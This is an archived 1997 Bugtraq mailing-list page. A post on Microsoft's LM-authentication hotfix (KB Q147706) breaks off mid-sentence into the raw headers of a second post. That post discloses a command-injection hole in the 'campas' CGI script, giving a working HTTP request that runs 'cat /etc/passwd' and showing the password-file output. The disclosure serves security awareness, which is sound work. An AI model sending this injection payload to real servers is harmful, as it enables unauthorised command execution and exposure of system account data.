Bugtraq mailing list archives
new post SP3 hotfix: lm-fix
From: alex () DAN LV (Alex Libenson)
Date: Sat, 12 Jul 1997 21:16:01 +0300
ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40/hotfixes-postSP3/lm-fix DOCUMENT:Q147706 TITLE:How to Disable LM Authentication on Windows NT PRODUCT:Microsoft Windows NT, Windows 95, Windows for Workgroups 3.11 and LAN Manager 2.2c PROD/VER:2.2 3.11 4.0 95 OPER/SYS:WINDOWS KEYWORD:kberrmsg kbfile ntsecurity NTSrvWkst ntstop -------------------------------------------------------------------------- The information in this article applies to: - Microsoft Windows NT Workstation version 4.0 - Microsoft Windows NT Server version 4.0 - Microsoft LAN Manager version 2.2c - Microsoft Windows for Workgroups version 3.11 - Microsoft Windows 95 -------------------------------------------------------------------------- SUMMARY ======= Windows NT supports the following two types of challenge/response authentication: - LanManager (LM) challenge/response - Windows NT challenge/response To allow access to servers that only support LM authentication, Windows NT clients currently send both authentication types. Microsoft developed a patch that supports a new registry From owner-bugtraq () NETSPACE ORG Wed Jul 16 06:02:05 1997 Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143]) by enteract.com (8.8.5/8.7.6) with ESMTP id GAA07872; Wed, 16 Jul 1997 06:02:02 -0500 (CDT) Received: from unknown () netspace org (port 6919 [128.148.157.6]) by brimstone.netspace.org with ESMTP id <35953-29504>; Wed, 16 Jul 1997 04:25:35 -0400 Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with spool id 4391835 for BUGTRAQ () NETSPACE ORG; Wed, 16 Jul 1997 04:19:04 -0400 Received: from brimstone.netspace.org (brimstone [128.148.157.143]) by netspace.org (8.8.5/8.8.2) with ESMTP id EAA12307 for <BUGTRAQ () NETSPACE ORG>; Wed, 16 Jul 1997 04:18:16 -0400 Received: from unknown () netspace org (port 6919 [128.148.157.6]) by brimstone.netspace.org with ESMTP id <35892-29502>; Wed, 16 Jul 1997 04:21:58 -0400 Approved-By: aleph1 () UNDERGROUND ORG Received: from castor.javeriana.edu.co (castor.javeriana.edu.co [200.3.149.198]) by netspace.org (8.8.5/8.8.2) with ESMTP id TAA29138 for <BUGTRAQ () NETSPACE ORG>; Tue, 15 Jul 1997 19:17:04 -0400 Received: from localhost (ftorres@localhost) by castor.javeriana.edu.co (8.7.5/8.7.3) with SMTP id SAA01292 for <BUGTRAQ () NETSPACE ORG>; Tue, 15 Jul 1997 18:24:31 -0500 MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Message-ID: <Pine.LNX.3.96.970715180941.1257A-100000 () castor javeriana edu co> Date: Tue, 15 Jul 1997 18:24:31 -0500 Reply-To: Francisco Torres <ftorres () CASTOR JAVERIANA EDU CO> Sender: Bugtraq List <BUGTRAQ () NETSPACE ORG> From: Francisco Torres <ftorres () CASTOR JAVERIANA EDU CO> Subject: Bug CGI campas To: BUGTRAQ () NETSPACE ORG In-Reply-To: <Pine.LNX.3.96.970715183741.21934G-100000 () typhaon ucs uwa edu au> CAMPAS SECURITY BUG ------------------- ET Lownoise Colombia 1997 CGI: campas #!/bin/sh #pragma ident "@(#)campas.sh 1.2 95/05/24 NCSA" Impact: Execute commands Exploit:
telnet www.xxxx.net 80
Trying 200.xx.xx.xx... Connected to venus.xxxx.net Escape character is '^]'. GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a <PRE> root:x:0:1:Super-User:/export/home/root:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/:/bin/false .... continue :P Solution: 1-If u dont use it erase it.! 2-Dont use it again.. (go point 1) Well another line to put in vito.ini. ET LOwnoise 1997 Colombia
Current thread:
- Vulnerability in Glimpse HTTP Razvan Dragomirescu (Jul 02)
- Re: Vulnerability in Glimpse HTTP Brian Gentry (Jul 02)
- Re: Vulnerability in Glimpse HTTP Jean-Christophe Touvet (Jul 03)
- Re: Vulnerability in Glimpse HTTP Paul Phillips (Jul 08)
- Re: Vulnerability in Glimpse HTTP Oliver Friedrichs (Jul 09)
- CERT Vendor-Initiated Bulletin VB-97.05 - Vul in Lynx Temporary Nicolas Dubee (Jan 01)
- Re: Vulnerability in Glimpse HTTP Martin Pool (Jul 10)
- It's not over yet. Aleph One (Jul 11)
- It's not over yet. Manley, Jim W (Jul 11)
- More information about JavaScript bug Dominick Matthias PN OIL 6 (Jul 11)
- new post SP3 hotfix: lm-fix Alex Libenson (Jul 12)
- Minor PGP vulnerability Harald Weidner (Jul 15)
- GetAdmin - Hotfix silent release ? Olivier Gerschel (Jul 16)
- Re: Minor PGP vulnerability Lucky Green (Jul 16)
- CERT Advisory CA-97.21 - SGI Buffer Overflow Vulnerabilities Aleph One (Jul 17)
- slight misinformation in CA-97.21 Dave Kormann (Jul 17)
- msg00234.html brush () SEARCH POL PL (Jul 17)
- CERT Vendor-Initiated Bulletin VB-97.05 - Vul in Lynx Temporary Aleph One (Jul 16)
- Sun Security Bulletin #00146 Aleph One (Jul 16)
- Sun CDE 1.0.1: login bug Isaac (Jul 28)
- Re: Sun CDE 1.0.1: login bug Doug Hughes (Jul 29)
- Re: Vulnerability in Glimpse HTTP Brian Gentry (Jul 02)